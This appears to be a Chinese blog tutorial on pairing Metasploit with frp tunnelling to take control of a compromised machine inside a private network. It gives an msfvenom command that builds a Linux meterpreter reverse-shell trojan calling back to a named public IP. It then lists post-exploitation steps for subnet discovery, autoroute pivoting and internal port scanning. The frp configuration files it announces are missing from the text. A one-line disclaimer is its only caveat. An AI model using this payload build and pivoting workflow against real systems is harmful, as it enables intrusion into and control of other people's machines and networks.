MSF+FRP实现内网渗透

声明: 严禁用作非法目的,谢绝一切形式的转载。

在这里对介绍了如何通过frp进行内网穿透。本篇 文章将frp与MSF结合起来,实现获取被入侵机器("肉鸡")的控制权。

网络拓扑

通过家庭kali主机,获取到肉鸡的meterpreter。

frp配置

frps

frp服务器端配置文件frps.ini如下:

使用了dashboard。通过dashboard可以查看frp服务器的状态。

运行frps

./frps -c frps.ini

frpc

frp客户端配置文件frpc.ini如下:

运行frpc

./frpc -c frpc.ini

MSF

生成木马

通过如下命令生成木马,注意这里的LHOST是公网的ip,LPORT是上面frpc.ini的remote_port。这是最重要的地方。

msfvenom -a x64 --platform linux  -p linux/x64/meterpreter/reverse_tcp  LHOST=47.92.90.25 LPORT=7002  -i 3 -f elf -o test_7002

获取meterpreter

注意这里的lhost是localip即127.0.0.1、lport是localport即5555。这里是端口进行了转发。

获取路由信息

run get_local_subnets

自动添加路由

run post/multi/manage/autoroute

查看路由信息

run autoroute -p

注意这里的网关是session 1。

扫描开放的端口

使用auxiliary/scanner/portscan/tcp模块进行端口扫描。

这些扫描大多数的噢没有nmap强大,但是nmap在这里不能直接使用,需要设置socks代理,后续文章会详细介绍如何通过nmap进行扫描。

数据流

在"肉鸡"出查看7002端口的数据流。

在Kali中查看ip=47.92.90.25的数据流。

公众号

更多内容,欢迎关注我的微信公众号:无情剑客。

你可能感兴趣的:(MSF+FRP实现内网渗透)